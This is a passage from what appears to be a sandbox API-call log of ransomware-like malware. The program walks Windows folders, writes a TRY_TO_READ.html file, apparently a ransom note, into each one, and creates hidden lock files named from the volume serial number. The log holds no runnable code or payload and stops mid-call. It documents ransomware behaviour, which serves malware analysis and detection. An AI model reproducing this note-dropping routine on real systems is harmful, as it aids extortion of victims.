1 [0065.581] CloseHandle (hObject=0x45c) returned 1 [0065.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0065.581] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0065.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.581] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.581] GetLastError () returned 0x0 [0065.581] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.581] GetLastError () returned 0x0 [0065.581] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.581] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.581] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0065.581] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f720 [0065.582] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0065.582] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.582] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.582] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.582] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b88 [0065.582] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.582] GetLastError () returned 0x0 [0065.582] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.582] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0065.582] GetLastError () returned 0x0 [0065.582] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.582] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.587] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.587] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.588] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.588] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.588] CloseHandle (hObject=0x45c) returned 1 [0065.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0065.588] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0065.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.588] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.588] GetLastError () returned 0x0 [0065.588] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.588] GetLastError () returned 0x0 [0065.588] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.588] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.588] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0065.588] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f748 [0065.588] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b88 [0065.588] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.589] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.589] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.589] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458c10 [0065.589] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.589] GetLastError () returned 0x0 [0065.589] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.589] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0065.589] GetLastError () returned 0x0 [0065.589] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.589] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.592] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.593] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.593] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.593] CloseHandle (hObject=0x45c) returned 1 [0065.593] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.593] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.593] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.593] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0065.593] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0065.593] CloseHandle (hObject=0x3cc) returned 1 [0065.593] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.594] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0xed)) [0065.594] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.594] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.594] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.594] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\PerfLogs\\Admin9c354ca09c354b444c.lock") returned 41 [0065.594] CreateFileW (lpFileName="C:\\\\PerfLogs\\Admin9c354ca09c354b444c.lock" (normalized: "c:\\perflogs\\admin9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.594] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.594] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c978 | out: hHeap=0x410000) returned 1 [0065.595] FindFirstFileW (in: lpFileName="C:\\\\PerfLogs\\Admin\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x309e0d90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309e0d90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e7b0 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.595] GetLastError () returned 0x0 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e7f0 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e7f0 | out: hHeap=0x410000) returned 1 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0065.595] FindNextFileW (in: hFindFile=0x48e7b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x309e0d90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309e0d90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.595] GetLastError () returned 0x0 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e7f0 [0065.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e7f0 | out: hHeap=0x410000) returned 1 [0065.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0065.596] FindNextFileW (in: hFindFile=0x48e7b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309e0d90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309e0d90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a06ef0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.596] GetLastError () returned 0x0 [0065.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.596] GetLastError () returned 0x0 [0065.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0065.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0065.596] FindNextFileW (in: hFindFile=0x48e7b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309e0d90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309e0d90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a06ef0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.596] CloseHandle (hObject=0x3cc) returned 1 [0065.596] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.596] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0xed)) [0065.596] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.597] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.597] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.597] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b9c354ca09c354b444c.lock") returned 72 [0065.597] CreateFileW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b9c354ca09c354b444c.lock" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.599] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.599] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x466ea8 [0065.599] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.599] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0065.599] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca18 | out: hHeap=0x410000) returned 1 [0065.599] FindFirstFileW (in: lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x30a06ef0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a06ef0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e7f0 [0065.599] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.599] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.599] GetLastError () returned 0x0 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e830 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e830 | out: hHeap=0x410000) returned 1 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.600] FindNextFileW (in: hFindFile=0x48e7f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x30a06ef0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a06ef0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.600] GetLastError () returned 0x0 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e830 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e830 | out: hHeap=0x410000) returned 1 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.600] FindNextFileW (in: hFindFile=0x48e7f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.600] GetLastError () returned 0x0 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.601] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b88 [0065.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48dae8 [0065.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.601] CreateFileW 